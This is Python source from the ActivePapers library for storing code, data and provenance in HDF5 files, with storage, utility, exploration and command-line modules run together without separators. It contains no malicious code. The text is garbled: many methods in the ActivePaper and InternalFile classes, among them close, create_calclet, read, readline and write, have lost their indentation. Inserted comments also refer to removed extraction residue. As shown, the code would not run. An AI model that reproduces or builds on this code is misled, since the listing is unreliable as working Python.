# NOTE: dataset-extraction residue (corpus column headers) removed from
# the top of this file.
import collections
import getpass
import imp
import importlib
import io
import itertools as it
import os
import socket
import sys
import weakref
import numpy as np
import h5py
from activepapers.utility import ascii, utf8, h5vstring, isstring, execcode, \
codepath, datapath, owner, mod_time, \
datatype, timestamp, stamp, ms_since_epoch
from activepapers.execution import Calclet, Importlet, DataGroup, paper_registry
from activepapers.library import find_in_library
import activepapers.version
# Text stored in the top-level README dataset of every newly created
# ActivePaper file, so that people who open the HDF5 file with generic
# tools know what they are looking at.
readme_text = """
This file is an ActivePaper (Python edition).
For more information about ActivePapers see:
http://www.activepapers.org/
"""
#
# The ActivePaper class is the only one in this library
# meant to be used directly by client code.
#
class ActivePaper(object):
    """Handle for an ActivePaper HDF5 file (read, update, or create)."""

    def __init__(self, filename, mode="r", dependencies=None):
        """Open or create an ActivePaper HDF5 file.

        :param filename: name of the HDF5 file
        :param mode: "r", "r+" or "w", passed on to h5py.File
        :param dependencies: names of external Python packages used by
            the paper's code; only allowed when creating a file ("w")
        """
        self.filename = filename
        self.file = h5py.File(filename, mode)
        self.open = True
        self.writable = False
        if mode[0] == 'r':
            # Opening an existing paper: verify the data model marker
            # and look up the standard groups.
            assert dependencies is None
            if ascii(self.file.attrs['DATA_MODEL']) != 'active-papers-py':
                raise ValueError("File %s is not an ActivePaper" % filename)
            self.code_group = self.file["code"]
            self.data_group = self.file["data"]
            self.documentation_group = self.file["documentation"]
            self.writable = '+' in mode
            self.history = self.file['history']
            deps = self.file.get('external-dependencies/'
                                 'python-packages', None)
            if deps is None:
                self.dependencies = []
            else:
                self.dependencies = [ascii(n) for n in deps]
            # Import the declared external packages up front so that
            # codelets can rely on them being available.
            for module_name in self.dependencies:
                importlib.import_module(module_name)
        elif mode[0] == 'w':
            # Creating a new paper: write the data model marker and the
            # standard group structure.
            self.file.attrs['DATA_MODEL'] = ascii('active-papers-py')
            self.file.attrs['DATA_MODEL_MAJOR_VERSION'] = 0
            self.file.attrs['DATA_MODEL_MINOR_VERSION'] = 1
            self.code_group = self.file.create_group("code")
            self.data_group = self.file.create_group("data")
            self.documentation_group = self.file.create_group("documentation")
            deps = self.file.create_group('external-dependencies')
            if dependencies is None:
                self.dependencies = []
            else:
                # Validate and record the declared external packages.
                for module_name in dependencies:
                    assert isstring(module_name)
                    importlib.import_module(module_name)
                self.dependencies = dependencies
                ds = deps.create_dataset('python-packages',
                                         dtype = h5vstring,
                                         shape = (len(dependencies),))
                ds[:] = dependencies
            # One history record per open/close cycle, including the
            # version numbers of all relevant software packages.
            htype = np.dtype([('opened', np.int64),
                              ('closed', np.int64),
                              ('platform', h5vstring),
                              ('hostname', h5vstring),
                              ('username', h5vstring)]
                             + [(name+"_version", h5vstring)
                                for name in ['activepapers','python',
                                             'numpy', 'h5py', 'hdf5']
                                            + self.dependencies])
            self.history = self.file.create_dataset("history", shape=(0,),
                                                    dtype=htype,
                                                    chunks=(1,),
                                                    maxshape=(None,))
            readme = self.file.create_dataset("README",
                                              dtype=h5vstring, shape = ())
            readme[...] = readme_text
            self.writable = True
        if self.writable:
            # Start a new history entry for this session.
            self.update_history(close=False)
        import activepapers.utility
        self.data = DataGroup(self, None, self.data_group, ExternalCode(self))
        self.imported_modules = {}
        self._local_modules = {}
        # Register the paper under a per-process unique id so that
        # codelets can find it (see paper_registry).
        paper_registry[self._id()] = self
def _id(self):
return hex(id(self))[2:]
    def update_history(self, close):
        """Append to or finalize the /history log.

        :param close: if True, fill in the 'closed' time of the most
            recent entry; if False, append a new entry whose 'closed'
            field stays 0 until the paper is closed.
        """
        if close:
            # Record the closing time in the last history entry.
            entry = tuple(self.history[-1])
            self.history[-1] = (entry[0], ms_since_epoch()) + entry[2:]
        else:
            self.history.resize((1+len(self.history),))
            def getversion(name):
                # Version of an imported module; 'unknown' if it does
                # not define __version__.
                if hasattr(sys.modules[name], '__version__'):
                    return getattr(sys.modules[name], '__version__')
                else:
                    return 'unknown'
            self.history[-1] = (ms_since_epoch(), 0,
                                sys.platform,
                                socket.getfqdn(),
                                getpass.getuser(),
                                activepapers.__version__,
                                sys.version.split()[0],
                                np.__version__,
                                h5py.version.version,
                                h5py.version.hdf5_version) \
                               + tuple(getversion(m) for m in self.dependencies)
def close(self):
if self.open:
if self.writable:
self.update_history(close=True)
del self._local_modules
self.open = False
try:
self.file.close()
except:
pass
paper_id = hex(id(self))[2:]
try:
del paper_registry[paper_id]
except KeyError:
pass
def assert_is_open(self):
if not self.open:
raise ValueError("ActivePaper %s has been closed" % self.filename)
    def __enter__(self):
        # Context-manager support: "with ActivePaper(...) as paper:".
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Close on exit; do not suppress exceptions.
        self.close()
        return False

    def flush(self):
        # Flush pending HDF5 writes to disk.
        self.file.flush()
    def _create_ref(self, path, paper_ref, ref_path, group, prefix):
        """Create a reference dataset at *path* pointing to *ref_path*
        in the paper identified by *paper_ref*.

        :param group: attribute name of the section group
            ('data_group', 'code_group'), or None for the whole file
        :param prefix: section prefix ('/data', '/code') prepended to
            the stored target path, or None
        """
        if ref_path is None:
            ref_path = path
        if group is None:
            group = 'file'
        if prefix is None:
            prefix = ''
        else:
            prefix += '/'
        paper = open_paper_ref(paper_ref)
        # Access the item to make sure it exists
        item = getattr(paper, group)[ref_path]
        ref_dtype = np.dtype([('paper_ref', h5vstring), ('path', h5vstring)])
        ds = getattr(self, group).require_dataset(path, shape=(),
                                                  dtype=ref_dtype)
        ds[...] = (paper_ref, prefix + ref_path)
        stamp(ds, 'reference', {})
        return ds

    def create_ref(self, path, paper_ref, ref_path=None):
        # Reference to an arbitrary location in another paper.
        return self._create_ref(path, paper_ref, ref_path, None, None)

    def create_data_ref(self, path, paper_ref, ref_path=None):
        # Reference into the /data section of another paper.
        return self._create_ref(path, paper_ref, ref_path,
                                'data_group', '/data')

    def create_code_ref(self, path, paper_ref, ref_path=None):
        # Reference into the /code section of another paper.
        return self._create_ref(path, paper_ref, ref_path,
                                'code_group', '/code')

    def create_module_ref(self, path, paper_ref, ref_path=None):
        # Reference to a Python module stored in another paper.
        path = "python-packages/" + path
        if ref_path is not None:
            ref_path = "python-packages/" + ref_path
        return self.create_code_ref(path, paper_ref, ref_path)

    def create_copy(self, path, paper_ref, ref_path=None):
        """Copy an item from another paper into this one, recording its
        origin in the ACTIVE_PAPER_COPIED_FROM attribute."""
        if ref_path is None:
            ref_path = path
        paper = open_paper_ref(paper_ref)
        item = paper.file[ref_path]
        self.file.copy(item, path, expand_refs=True)
        copy = self.file[path]
        # The provenance attributes refer to the source paper and would
        # be wrong in the copy.
        self._delete_dependency_attributes(copy)
        timestamp(copy, mod_time(item))
        ref_dtype = np.dtype([('paper_ref', h5vstring), ('path', h5vstring)])
        copy.attrs.create('ACTIVE_PAPER_COPIED_FROM',
                          shape=(), dtype=ref_dtype,
                          data=np.array((paper_ref, ref_path), dtype=ref_dtype))
        return copy

    def _delete_dependency_attributes(self, node):
        # Recursively remove provenance attributes from *node* and all
        # nodes below it.
        for attr_name in ['ACTIVE_PAPER_GENERATING_CODELET',
                          'ACTIVE_PAPER_DEPENDENCIES']:
            if attr_name in node.attrs:
                del node.attrs[attr_name]
        if isinstance(node, h5py.Group):
            for item in node:
                self._delete_dependency_attributes(node[item])
    def store_python_code(self, path, code):
        """Store *code* (a str) as a UTF-8 encoded scalar dataset under
        the code group and return the dataset."""
        self.assert_is_open()
        if not isstring(code):
            raise TypeError("Python code must be a string (is %s)"
                            % str(type(code)))
        ds = self.code_group.require_dataset(path,
                                             dtype=h5vstring, shape = ())
        ds[...] = code.encode('utf-8')
        ds.attrs['ACTIVE_PAPER_LANGUAGE'] = "python"
        return ds

    def add_module(self, name, module_code):
        """Store *module_code* as importable module *name* (dotted names
        become nested groups under code/python-packages)."""
        path = codepath('/'.join(['', 'python-packages'] + name.split('.')))
        ds = self.store_python_code(path, module_code)
        stamp(ds, "module", {})

    def import_module(self, name, python_path=sys.path):
        """Copy the source of module *name*, found on *python_path*,
        into the paper. Returns the package directory for packages,
        None for plain modules.

        NOTE(review): relies on the 'imp' module, which is deprecated
        and removed in Python 3.12; porting to importlib is needed for
        newer interpreters.
        """
        if name in self.imported_modules:
            return self.imported_modules[name]
        if '.' in name:
            # Submodule, add the underlying package first
            package, _, module = name.rpartition('.')
            path = [self.import_module(package, python_path)]
        else:
            module = name
            path = python_path
        file, filename, (suffix, mode, kind) = imp.find_module(module, path)
        if kind == imp.PKG_DIRECTORY:
            # A package: store its __init__.py under .../__init__.
            package = filename
            file = open(os.path.join(filename, '__init__.py'))
            name = name + '/__init__'
        else:
            package = None
        if file is None:
            raise ValueError("%s is not a Python module" % name)
        if kind != imp.PY_SOURCE:
            file.close()
            raise ValueError("%s is not a Python source code file"
                             % filename)
        self.add_module(name, ascii(file.read()))
        file.close()
        self.imported_modules[name] = package
        return package

    def get_local_module(self, name):
        """Return the code dataset for module *name* stored in this
        paper, or None if there is none."""
        path = codepath('/'.join(['', 'python-packages'] + name.split('.')))
        return APNode(self.code_group).get(path, None)
def create_calclet(self, path, script):
path = codepath(path)
if not path.startswith('/'):
path = '/'.join([self.code_group.name, path])
ds = self.store_python_code(path, script)
stamp(ds, "calclet", {})
return Calclet(self, ds)
def create_importlet(self, path, script):
path = codepath(path)
if not path.startswith('/'):
path = '/'.join([self.code_group.name, path])
ds = self.store_python_code(path, script)
stamp(ds, "importlet", {})
return Importlet(self, ds)
    def run_codelet(self, path, debug=False):
        """Run the calclet or importlet at *path*.

        Returns None on success, or a formatted traceback string on
        failure (with *debug*, pdb is entered instead).
        """
        if path.startswith('/'):
            assert path.startswith('/code/')
            path = path[6:]
        node = APNode(self.code_group)[path]
        class_ = {'calclet': Calclet, 'importlet': Importlet}[datatype(node)]
        try:
            class_(self, node).run()
            return None
        except Exception:
            # TODO: preprocess traceback to show only the stack frames
            # in the codelet.
            import traceback
            type, value, trace = sys.exc_info()
            stack = traceback.extract_tb(trace)
            del trace
            # Drop the frames of the codelet runner itself, up to and
            # including the execcode frame.
            while stack:
                if stack[0][2] == 'execcode':
                    del stack[0]
                    break
                del stack[0]
            fstack = []
            for filename, lineno, fn_name, code in stack:
                if ':' in filename:
                    # Frames inside a paper use "paper_id:codelet_path"
                    # pseudo-filenames; translate them for display.
                    paper_id, codelet = filename.split(':')
                    paper = paper_registry.get(paper_id)
                    if paper is None:
                        paper_name = '<ActivePaper>'
                    else:
                        paper_name = '<%s>' % paper.file.filename
                    filename = ':'.join([paper_name, codelet])
                    if code is None and paper is not None:
                        # Recover the source line from the stored code.
                        script = utf8(paper.file[codelet][...].flat[0])
                        code = script.split('\n')[lineno-1]
                fstack.append((filename, lineno, fn_name, code))
            tb_text = ''.join(["Traceback (most recent call last):\n"] + \
                              traceback.format_list(fstack) + \
                              traceback.format_exception_only(type, value))
            if debug:
                sys.stderr.write(tb_text)
                import pdb
                pdb.post_mortem()
            else:
                return tb_text
    def calclets(self):
        """Return a dict mapping item names to Calclet objects for all
        calclets in the paper."""
        return dict((item.name,
                     Calclet(self, item))
                    for item in self.iter_items()
                    if datatype(item) == 'calclet')

    def remove_owned_by(self, codelet):
        """Delete all items that were generated by *codelet*."""
        def owned(group):
            # Collect the names of all nodes below *group* that are
            # owned by the codelet.
            nodes = []
            for node in group.values():
                if owner(node) == codelet:
                    nodes.append(node.name)
                elif isinstance(node, h5py.Group) \
                     and datatype(node) != 'data':
                    nodes.extend(owned(node))
            return nodes
        for group in [self.code_group,
                      self.data_group,
                      self.documentation_group]:
            for node_name in owned(group):
                del self.file[node_name]
def replace_by_dummy(self, item_name):
item = self.file[item_name]
codelet = owner(item)
assert codelet is not None
dtype = datatype(item)
mtime = mod_time(item)
deps = item.attrs.get('ACTIVE_PAPER_DEPENDENCIES')
del self.file[item_name]
ds = self.file.create_dataset(item_name,
data=np.zeros((), dtype=np.int))
stamp(ds, dtype,
dict(ACTIVE_PAPER_GENERATING_CODELET=codelet,
ACTIVE_PAPER_DEPENDENCIES=list(deps)))
timestamp(ds, mtime)
ds.attrs['ACTIVE_PAPER_DUMMY_DATASET'] = True
def is_dummy(self, item):
return item.attrs.get('ACTIVE_PAPER_DUMMY_DATASET', False)
    def iter_items(self):
        """
        Iterate over the items in a paper.
        """
        def walk(group):
            # Recurse into subgroups, except groups of datatype 'data',
            # which count as single items.
            for node in group.values():
                if isinstance(node, h5py.Group) \
                   and datatype(node) != 'data':
                    for gnode in walk(node):
                        yield gnode
                else:
                    yield node
        for group in [self.code_group,
                      self.data_group,
                      self.documentation_group]:
            for node in walk(group):
                yield node

    def iter_groups(self):
        """
        Iterate over the groups in a paper that are not items.
        """
        def walk(group):
            for node in group.values():
                if isinstance(node, h5py.Group) \
                   and datatype(node) != 'data':
                    yield node
                    for subnode in walk(node):
                        yield subnode
        for group in [self.code_group,
                      self.data_group,
                      self.documentation_group]:
            for node in walk(group):
                yield node

    def iter_dependencies(self, item):
        """
        Iterate over the dependencies of a given item in a paper.
        """
        if 'ACTIVE_PAPER_DEPENDENCIES' in item.attrs:
            for dep in item.attrs['ACTIVE_PAPER_DEPENDENCIES']:
                yield self.file[dep]

    def is_stale(self, item):
        """Return True if any dependency of *item* is newer than the
        item itself."""
        t = mod_time(item)
        for dep in self.iter_dependencies(item):
            if mod_time(dep) > t:
                return True
        return False

    def external_references(self):
        """Return a dict mapping each referenced paper to a pair of
        sets: (paths referenced, paths copied) from that paper."""
        def process(node, refs):
            if datatype(node) == 'reference':
                paper_ref, ref_path = node[()]
                refs[paper_ref][0].add(ref_path)
            elif 'ACTIVE_PAPER_COPIED_FROM' in node.attrs:
                source = node.attrs['ACTIVE_PAPER_COPIED_FROM']
                paper_ref, ref_path = source
                if h5py.version.version_tuple[:2] <= (2, 2):
                    # h5py 2.2 returns a wrong dtype
                    paper_ref = paper_ref.flat[0]
                    ref_path = ref_path.flat[0]
                refs[paper_ref][1].add(ref_path)
            if isinstance(node, h5py.Group):
                for item in node:
                    process(node[item], refs)
            return refs
        refs = collections.defaultdict(lambda: (set(), set()))
        for node in [self.code_group, self.data_group,
                     self.documentation_group]:
            process(node, refs)
        return refs
def has_dependencies(self, item):
"""
:param item: an item in a paper
:type item: h5py.Node
:return: True if the item has any dependencies
:rtype: bool
"""
return 'ACTIVE_PAPER_DEPENDENCIES' in item.attrs \
and len(item.attrs['ACTIVE_PAPER_DEPENDENCIES']) > 0
def dependency_graph(self):
"""
:return: a dictionary mapping the name of each item to the
set of the names of the items that depend on it
:rtype: dict
"""
graph = collections.defaultdict(set)
for item in it.chain(self.iter_items(), self.iter_groups()):
for dep in self.iter_dependencies(item):
graph[dep.name].add(item.name)
return graph
    def dependency_hierarchy(self):
        """
        Generator yielding a sequence of sets of HDF5 paths
        such that the items in each set depend only on the items
        in the preceding sets.
        """
        known = set()    # names whose dependencies are all satisfied
        unknown = set()  # (name, frozenset of dependency names) pairs
        for item in self.iter_items():
            d = (item.name,
                 frozenset(dep.name for dep in self.iter_dependencies(item)))
            if len(d[1]) > 0:
                unknown.add(d)
            else:
                known.add(d[0])
        yield set(self.file[p] for p in known)
        while len(unknown) > 0:
            # Items whose dependencies are all known become the next
            # level of the hierarchy.
            next = set(p for p, d in unknown if d <= known)
            if len(next) == 0:
                raise ValueError("cyclic dependencies")
            known |= next
            unknown = set((p, d) for p, d in unknown if p not in next)
            yield set(self.file[p] for p in next)

    def rebuild(self, filename):
        """
        Rebuild all the dependent items in the paper in a new file.
        First all items without dependencies are copied to the new
        file, then all the calclets are run in the new file in the
        order determined by the dependency graph in the original file.
        """
        deps = self.dependency_hierarchy()
        with ActivePaper(filename, 'w') as clone:
            # The first set contains the independent items; copy them.
            for item in next(deps):
                # Make sure all the groups in the path exist
                path = item.name.split('/')
                name = path[-1]
                groups = path[:-1]
                dest = clone.file
                while groups:
                    group_name = groups[0]
                    if len(group_name) > 0:
                        if group_name not in dest:
                            dest.create_group(group_name)
                        dest = dest[group_name]
                    del groups[0]
                clone.file.copy(item, item.name, expand_refs=True)
                timestamp(clone.file[item.name])
            # The remaining sets are regenerated by re-running the
            # codelets that produced them.
            for items in deps:
                calclets = set(item.attrs['ACTIVE_PAPER_GENERATING_CODELET']
                               for item in items)
                for calclet in calclets:
                    clone.run_codelet(calclet)

    def snapshot(self, filename):
        """
        Make a copy of the ActivePaper in its current state.
        This is meant to be used from inside long-running
        codelets in order to permit external monitoring of
        the progress, given that HDF5 files being written cannot
        be read simultaneously.
        """
        self.file.flush()
        clone = h5py.File(filename, 'w')
        for item in self.file:
            clone.copy(self.file[item], item, expand_refs=True)
        for attr_name in self.file.attrs:
            clone.attrs[attr_name] = self.file.attrs[attr_name]
        clone.close()
def open_internal_file(self, path, mode='r', encoding=None, creator=None):
# path is always relative to the root group
if path.startswith('/'):
path = path[1:]
if not path.startswith('data/') \
and not path.startswith('documentation/'):
raise IOError((13, "Permission denied: '%s'" % path))
if creator is None:
creator = ExternalCode(self)
if mode[0] in ['r', 'a']:
ds = self.file[path]
elif mode[0] == 'w':
test = self.file.get(path, None)
if test is not None:
if not creator.owns(test):
raise ValueError("%s trying to overwrite data"
" created by %s"
% (creator.path, owner(test)))
del self.file[path]
ds = self.file.create_dataset(
path, shape = (0,), dtype = np.uint8,
chunks = (100,), maxshape = (None,))
else:
raise ValueError("unknown file mode %s" % mode)
return InternalFile(ds, mode, encoding)
#
# A dummy replacement that emulates the interface of Calclet.
#
class ExternalCode(object):
    """Stand-in codelet used when data is created from outside any
    codelet (e.g. interactively or by command-line tools)."""

    def __init__(self, paper):
        self.paper = paper
        self.path = None

    def add_dependency(self, dependency):
        """Dependencies are not tracked for external code."""
        pass

    def dependency_attributes(self):
        """External code contributes no provenance attributes."""
        return {}

    def owns(self, node):
        """External code is treated as the owner of every node."""
        return True
#
# A Python file interface for byte array datasets
#
class InternalFile(io.IOBase):

    def __init__(self, ds, mode, encoding=None):
        # ds: 1-d uint8 HDF5 dataset holding the file's bytes
        # mode: 'r'/'w'/'a', optionally with 'b' and/or '+'
        # encoding: if given, text mode using this codec
        self._ds = ds
        self._mode = mode
        self._encoding = encoding
        self._position = 0       # current read/write offset
        self._closed = False
        self._binary = 'b' in mode
        # Callback supplying provenance attributes when stamping.
        self._get_attributes = lambda: {}
        self._stamp()

    def readable(self):
        return True

    def writable(self):
        return self._mode[0] == 'w' or '+' in self._mode

    @property
    def closed(self):
        return self._closed

    @property
    def mode(self):
        return self._mode

    @property
    def name(self):
        # The HDF5 path of the underlying dataset.
        return self._ds.name

    def _check_if_open(self):
        # All operations require the file to be open.
        if self._closed:
            raise ValueError("file has been closed")
def _convert(self, data):
if self._binary:
return data
elif self._encoding is not None:
return data.decode(self._encoding)
else:
return ascii(data)
    def _set_attribute_callback(self, callback):
        # Install a callback supplying provenance attributes for
        # stamping (used by the execution machinery).
        self._get_attributes = callback

    def _stamp(self):
        # Record datatype 'file' and provenance on the dataset, but
        # only when the file may be modified.
        if self.writable():
            stamp(self._ds, "file", self._get_attributes())

    def close(self):
        self._closed = True
        self._stamp()

    def flush(self):
        # Nothing is buffered; only validity is checked.
        self._check_if_open()

    def isatty(self):
        return False

    def __next__(self):
        # Line-based iteration; stops at the end of the dataset.
        self._check_if_open()
        if self._position == len(self._ds):
            raise StopIteration
        return self.readline()

    next = __next__ # for Python 2

    def __iter__(self):
        return self

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Close on exit; do not suppress exceptions.
        self.close()
        return False
def read(self, size=None):
self._check_if_open()
if size is None:
size = len(self._ds)-self._position
if size == 0:
return ''
else:
new_position = self._position + size
data = self._ds[self._position:new_position]
self._position = new_position
return self._convert(data.tostring())
def readline(self, size=None):
self._check_if_open()
remaining = len(self._ds) - self._position
if remaining == 0:
return self._convert('')
for l in range(min(100, remaining), remaining+100, 100):
data = self._ds[self._position:self._position+l]
eols = np.nonzero(data == 10)[0]
if len(eols) > 0:
n = eols[0]+1
self._position += n
return self._convert(data[:n].tostring())
self._position = len(self._ds)
return self._convert(data.tostring())
    def readlines(self, sizehint=None):
        # *sizehint* is accepted for API compatibility but ignored.
        self._check_if_open()
        return list(line for line in self)

    def seek(self, offset, whence=os.SEEK_SET):
        # Standard file seek; the resulting position is clamped to the
        # dataset bounds instead of raising.
        self._check_if_open()
        file_length = len(self._ds)
        if whence == os.SEEK_SET:
            self._position = offset
        elif whence == os.SEEK_CUR:
            self._position += offset
        elif whence == os.SEEK_END:
            self._position = file_length + offset
        self._position = max(0, min(file_length, self._position))

    def tell(self):
        self._check_if_open()
        return self._position

    def truncate(self, size=None):
        # Truncate (or extend) the dataset; default: current position.
        self._check_if_open()
        if size is None:
            size = self._position
        self._ds.resize((size,))
        self._stamp()
def write(self, string):
self._check_if_open()
if self._mode[0] == 'r':
raise IOError("File not open for writing")
if not string:
# HDF5 crashes when trying to write a zero-length
# slice, so this must be handled as a special case.
return
if self._encoding is not None:
string = string.encode(self._encoding)
new_position = self._position + len(string)
if new_position > len(self._ds):
self._ds.resize((new_position,))
self._ds[self._position:new_position] = \
np.fromstring(string, dtype=np.uint8)
self._position = new_position
self._stamp()
def writelines(self, strings):
self._check_if_open()
for line in strings:
self.write(line)
#
# A wrapper for nodes that works across references
#
class APNode(object):

    def __init__(self, h5node, name = None):
        # The name defaults to the HDF5 path; it is tracked separately
        # so that paths crossing references remain meaningful.
        self._h5node = h5node
        self.name = h5node.name if name is None else name

    def is_group(self):
        return isinstance(self._h5node, h5py.Group)

    def __contains__(self, item):
        return item in self._h5node

    def __getitem__(self, item):
        if isinstance(self._h5node, h5py.Group):
            # Resolve a possibly multi-component path one component at
            # a time, following references along the way.
            path = item.split('/')
            if path[0] == '':
                # Absolute path: start over at the file root.
                node = APNode(self._h5node.file)
                path = path[1:]
            else:
                node = self
            for item in path:
                node = node._getitem(item)
            return node
        else:
            return self._h5node[item]
def get(self, item, default):
try:
return self[item]
except:
return default
    def _getitem(self, item):
        # Look up a single path component, dereferencing reference
        # datasets before and after the lookup.
        node = self._h5node
        if datatype(node) == 'reference':
            _, node = dereference(node)
        node = node[item]
        if datatype(node) == 'reference':
            _, node = dereference(node)
        name = self.name
        if not name.endswith('/'): name += '/'
        name += item
        return APNode(node, name)

    def __getattr__(self, attrname):
        # Everything not defined here is delegated to the wrapped node.
        return getattr(self._h5node, attrname)

    def in_paper(self, paper):
        # True if the wrapped node belongs to *paper*'s HDF5 file.
        return paper.file.id == self._h5node.file.id
#
# A global dictionary mapping paper_refs to papers.
# Each entry disappears when no reference to the paper remains.
#
# Weak values: a paper stays registered only while some other object
# still holds a reference to it.
_papers = weakref.WeakValueDictionary()
# # Close all open referenced papers at interpreter exit,
# # in order to prevent "murdered identifiers" in h5py.
# def _cleanup():
# for paper in activepapers.storage._papers.values():
# paper.close()
# import atexit
# atexit.register(_cleanup)
# del atexit
#
# Dereference a reference node
#
def dereference(ref_node):
    """Resolve a reference dataset to (paper, node) in the referenced
    paper."""
    assert datatype(ref_node) == 'reference'
    paper_ref, path = ref_node[()]
    paper = open_paper_ref(ascii(paper_ref))
    return paper, paper.file[path]
#
# Open a paper given its reference
#
def open_paper_ref(paper_ref):
    """Open the paper identified by *paper_ref* read-only, reusing an
    already-open instance when possible."""
    if paper_ref in _papers:
        return _papers[paper_ref]
    paper = ActivePaper(find_in_library(paper_ref), "r")
    _papers[paper_ref] = paper
    # Fixed: the final line had dataset-extraction residue fused onto
    # the return statement.
    return paper
import sys
import time
# Python 2/3 compatibility issues
if sys.version_info[0] == 2:
from activepapers.utility2 import *
else:
from activepapers.utility3 import *
# Various small functions
def datatype(node):
    """Return the ACTIVE_PAPER_DATATYPE attribute of *node* as an
    ASCII string, or None if it is not set."""
    value = node.attrs.get('ACTIVE_PAPER_DATATYPE', None)
    return None if value is None else ascii(value)

def owner(node):
    """Return the generating codelet recorded on *node*, or None."""
    value = node.attrs.get('ACTIVE_PAPER_GENERATING_CODELET', None)
    return None if value is None else ascii(value)

def language(node):
    """Return the programming language recorded on *node*, or None."""
    value = node.attrs.get('ACTIVE_PAPER_LANGUAGE', None)
    return None if value is None else ascii(value)
def mod_time(node):
    """Return the modification time of *node* in seconds since the
    epoch (the stored attribute is in milliseconds), or None."""
    stamp_ms = node.attrs.get('ACTIVE_PAPER_TIMESTAMP', None)
    return None if stamp_ms is None else stamp_ms/1000.
def ms_since_epoch():
    """Return the current time as integer milliseconds since the
    epoch."""
    now = time.time()
    return np.int64(1000.*now)
def timestamp(node, time=None):
    """Set ACTIVE_PAPER_TIMESTAMP on *node*.

    :param time: modification time in seconds since the epoch;
        defaults to now. Stored in milliseconds.
    """
    stamp_ms = ms_since_epoch() if time is None else time * 1000.
    node.attrs['ACTIVE_PAPER_TIMESTAMP'] = stamp_ms
def stamp(node, ap_type, attributes):
    """Set the ActivePaper datatype and provenance attributes on
    *node* and update its timestamp.

    Re-stamping with a different datatype is rejected, except for a
    few explicitly allowed transformations.
    """
    allowed_transformations = {'group': 'data',
                               'data': 'group',
                               'file': 'text'}
    attrs = dict(attributes)
    attrs['ACTIVE_PAPER_DATATYPE'] = ap_type
    for key, value in attrs.items():
        if value is None:
            # None means "no information"; never stored.
            continue
        if isstring(value):
            previous = node.attrs.get(key, None)
            if previous is None:
                node.attrs[key] = value
            else:
                if previous != value:
                    # String attributes can't change when re-stamping...
                    if key == 'ACTIVE_PAPER_DATATYPE' \
                       and allowed_transformations.get(previous) == value:
                        # ...with a few exceptions
                        node.attrs[key] = value
                    else:
                        raise ValueError("%s: %s != %s"
                                         % (key, value, previous))
        elif key == 'ACTIVE_PAPER_DEPENDENCIES':
            # Stored as a variable-length string array.
            node.attrs.create(key, np.array(value, dtype=object),
                              shape = (len(value),), dtype=h5vstring)
        else:
            raise ValueError("unexpected key %s" % key)
    timestamp(node)
def path_in_section(path, section):
    """Interpret *path* relative to *section*: an absolute path is
    prefixed with the section name, a relative path is returned
    unchanged (to be resolved later relative to the current group)."""
    if not isstring(path):
        raise ValueError("type %s where string is expected"
                         % str(type(path)))
    if path.startswith("/"):
        return section + path
    else:
        return path

def datapath(path):
    """Return *path* anchored in the /data section."""
    return path_in_section(path, "/data")

def codepath(path):
    """Return *path* anchored in the /code section.

    Fixed: the final line had dataset-extraction residue fused onto
    the return statement.
    """
    return path_in_section(path, "/code")
from activepapers.storage import ActivePaper as ActivePaperStorage
from activepapers.storage import open_paper_ref
from activepapers.utility import path_in_section
class ActivePaper(object):
    """Read-only access to an ActivePaper for interactive exploration.

    Accepts a filename or a library reference. At most one paper per
    process may make its stored Python code importable
    (use_code=True).
    """

    def __init__(self, file_or_ref, use_code=True):
        global _paper_for_code
        try:
            # First interpret the argument as a library reference...
            self.paper = open_paper_ref(file_or_ref)
        except ValueError:
            # ...and fall back to treating it as a filename.
            self.paper = ActivePaperStorage(file_or_ref, 'r')
        if use_code and ("python-packages" not in self.paper.code_group \
                         or len(self.paper.code_group["python-packages"]) == 0):
            # The paper contains no importable modules or packages.
            use_code = False
        if use_code and _paper_for_code is not None:
            raise IOError("Only one ActivePaper per process can use code.")
        self.data = self.paper.data
        self.documentation = self.paper.documentation_group
        self.code = self.paper.code_group
        try:
            # Expose the paper's README as the object's docstring.
            self.__doc__ = self.open_documentation('README').read()
        except KeyError:
            pass
        if use_code:
            _paper_for_code = self.paper

    def close(self):
        # Release the process-wide "code provider" slot if we hold it.
        global _paper_for_code
        if _paper_for_code is self.paper:
            _paper_for_code = None

    def _open(self, path, section, mode='r'):
        # Internal: open a read-only file in the given section.
        if mode not in ['r', 'rb']:
            raise ValueError("invalid mode: " + repr(mode))
        path = path_in_section(path, section)
        if not path.startswith('/'):
            path = section + '/' + path
        return self.paper.open_internal_file(path, mode, 'utf8', None)

    def open(self, path, mode='r'):
        """Open a file in the /data section."""
        return self._open(path, '/data', mode)

    def open_documentation(self, path, mode='r'):
        """Open a file in the /documentation section."""
        return self._open(path, '/documentation', mode)

    def read_code(self, file):
        """Return the source code of code item *file* as a str."""
        return self.code[file][...].ravel()[0].decode('utf-8')
# The single paper whose code is importable in this process, or None.
_paper_for_code = None

def _get_codelet_and_paper():
    # No codelet context exists in interactive exploration; only the
    # paper opened with use_code=True is available.
    return None, _paper_for_code

# Redirect codelet/paper lookup in the execution module to the
# exploration-mode implementation defined above.
import activepapers.execution
activepapers.execution.get_codelet_and_paper = _get_codelet_and_paper
# Fixed: the next line had dataset-extraction residue fused onto it.
del _get_codelet_and_paper
import fnmatch
import itertools as it
import os
import re
import subprocess
import sys
import time
import tempdir
import numpy
import h5py
import activepapers.storage
from activepapers.utility import ascii, datatype, mod_time, stamp, \
timestamp, raw_input
class CLIExit(Exception):
    """Raised to abort command-line processing after an error message
    has been written to stderr."""
def get_paper(input_filename):
    """Return the ActivePaper filename to operate on.

    If no filename was given on the command line, use the unique *.ap
    file in the current directory; otherwise complain on stderr and
    raise CLIExit.
    """
    if input_filename is not None:
        return input_filename
    candidates = [fn for fn in os.listdir('.') if fn.endswith('.ap')]
    if len(candidates) == 1:
        return candidates[0]
    sys.stderr.write("no filename given and ")
    if candidates:
        sys.stderr.write("%d HDF5 files in current directory\n"
                         % len(candidates))
    else:
        sys.stderr.write("no HDF5 file in current directory\n")
    raise CLIExit
#
# Support for checkin/checkout/extract
#
# Datatypes whose contents can be written to / read from plain files.
extractable_types = ['calclet', 'importlet', 'module', 'file', 'text']
# File extension used when extracting an item of a given
# (datatype, language) combination.
file_extensions = {('calclet', 'python'): '.py',
                   ('importlet', 'python'): '.py',
                   ('module', 'python'): '.py',
                   ('file', None): '',
                   ('text', 'HTML'): '.html',
                   ('text', 'LaTeX'): '.tex',
                   ('text', 'markdown'): '.md',
                   ('text', 'reStructuredText'): '.rst',
                   ('text', None): '.txt'}
